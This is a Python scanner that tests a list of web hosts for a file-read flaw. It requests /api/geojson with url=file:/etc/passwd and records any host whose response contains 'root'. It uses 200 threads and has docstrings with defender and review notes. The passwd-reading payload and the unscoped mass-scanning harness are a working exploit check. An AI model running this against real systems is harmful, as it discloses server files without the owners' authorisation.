def verify(urls):
    """Probe one base URL for the file-read behaviour this script reports.

    Sends a single GET to ``<urls>/api/geojson`` with ``url=file:/etc/passwd``
    and records the host when the response body contains the substring
    ``root``. Returns ``None`` in every case; findings are written via
    ``save_vuln`` and echoed to stdout.

    Defender notes:
      * A hit means the server fetched a ``file:`` URL on behalf of the
        client. Requests to ``/api/geojson`` whose query string carries
        ``url=file:`` are the corresponding signal in access logs.
      * NOTE(review): the CVE id is taken verbatim from the message string
        below; confirm it is the advisory that actually covers this
        endpoint before relying on the labels in vuln.txt.
      * NOTE(review): ``'root' in body`` is a loose heuristic. Any page that
        happens to contain that word is reported, so results need manual
        confirmation.
    """
    target = urls + '/api/geojson?url=file:/etc/passwd'
    request_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
    try:
        # verify=False turns off TLS certificate validation, so the response
        # is not authenticated; allow_redirects=False means a 3xx body is
        # inspected as-is rather than followed.
        response = requests.get(
            target,
            headers=request_headers,
            timeout=10,
            verify=False,
            allow_redirects=False,
        )
        if 'root' not in response.text:
            return
        info = "[+] 存在CVE-2021-36749漏洞: " + urls
        save_vuln(info)
        print(info)
    except Exception:
        # Best-effort: every failure (connection errors, timeouts, and also
        # errors raised while saving) is dropped silently, so an unreachable
        # host is indistinguishable from a negative result.
        pass
def save_vuln(info):
    """Append ``info`` followed by a newline to ``vuln.txt``.

    The file is opened relative to the current working directory in append
    mode with UTF-8 encoding, so repeated runs accumulate findings.
    NOTE(review): callers run this from many worker threads and no lock is
    taken here; confirm that interleaved lines are acceptable.
    """
    with open("vuln.txt", 'a', encoding='utf-8') as out_file:
        out_file.write(info + '\n')
def get_file_url():
    """Return the non-blank lines of ``url.txt`` with whitespace stripped.

    The file is read from the current working directory as UTF-8. Entries
    are not validated in any way (scheme, host, duplicates); each one is
    later used as a URL prefix by the caller.
    """
    targets = []
    with open("url.txt", 'r', encoding='UTF-8') as handle:
        for raw_line in handle:
            cleaned = raw_line.strip()
            if cleaned:
                targets.append(cleaned)
    return targets
if __name__ == "__main__":
    # Scope of the run is exactly the contents of url.txt; nothing here
    # restricts or de-duplicates the target list.
    targets = get_file_url()
    # 200 worker threads; each queued request calls verify() on one entry.
    pool = threadpool.ThreadPool(200)
    for work_item in threadpool.makeRequests(verify, targets):
        pool.putRequest(work_item)
    # Block until every queued check has finished.
    pool.wait()